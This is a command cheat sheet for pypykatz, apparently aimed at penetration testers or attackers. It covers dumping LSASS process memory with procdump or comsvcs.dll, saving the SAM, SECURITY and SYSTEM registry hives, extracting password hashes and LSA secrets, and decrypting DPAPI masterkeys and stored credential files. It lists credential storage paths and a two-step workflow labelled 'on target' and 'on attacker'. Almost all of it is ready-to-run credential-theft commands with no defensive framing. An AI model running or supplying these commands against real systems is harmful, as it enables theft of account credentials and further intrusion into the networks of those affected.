pip3 install pypykatz
Command Description
pypykatz lsa minidump lsass.dmpParse LSASS dump pypykatz lsa minidump lsass.dmp -o jsonJSON output pypykatz lsa minidump /path/ -rRecursive directory pypykatz live lsaLive LSASS (Windows, admin)
# Full extraction
pypykatz registry --sam SAM --security SECURITY --system SYSTEM
# SAM only
pypykatz registry --sam SAM --system SYSTEM
# LSA secrets only
pypykatz registry --security SECURITY --system SYSTEM
pypykatz dpapi credential <cred_file> <masterkey>
pypykatz dpapi credentials <creds_dir> --mkf <masterkey_file>
pypykatz dpapi vcrd <vcrd_file> <masterkey>
# With password
pypykatz dpapi masterkey <masterkey_file> -p <password>
# With domain backup key
pypykatz dpapi masterkey <masterkey_file> --pvk <backup.pvk>
# Generate prekey
pypykatz dpapi prekey password <SID> <password>
procdump.exe -ma lsass.exe lsass.dmp
rundll32 comsvcs.dll MiniDump <PID> lsass.dmp full
reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM
Type Path
User Credentials %AppData%\Microsoft\Credentials\User Vault %AppData%\Microsoft\Vault\User Masterkeys %AppData%\Microsoft\Protect\<SID>\System Credentials %SystemRoot%\System32\config\systemprofile\...
Option Format
-o textHuman-readable (default) -o jsonJSON -o grepGrep-friendly
# 1. Dump on target
procdump.exe -ma lsass.exe lsass.dmp
# 2. Analyze on attacker (any OS)
pypykatz lsa minidump lsass.dmp
# 1. Get masterkeys from LSASS
pypykatz lsa minidump lsass.dmp | grep -i dpapi
# 2. Decrypt credential file
pypykatz dpapi credential <cred_file> <guid>:<key_hex>
Tool Use Case
Mimikatz Live Windows attacks LaZagne Application credentials Impacket Remote attacks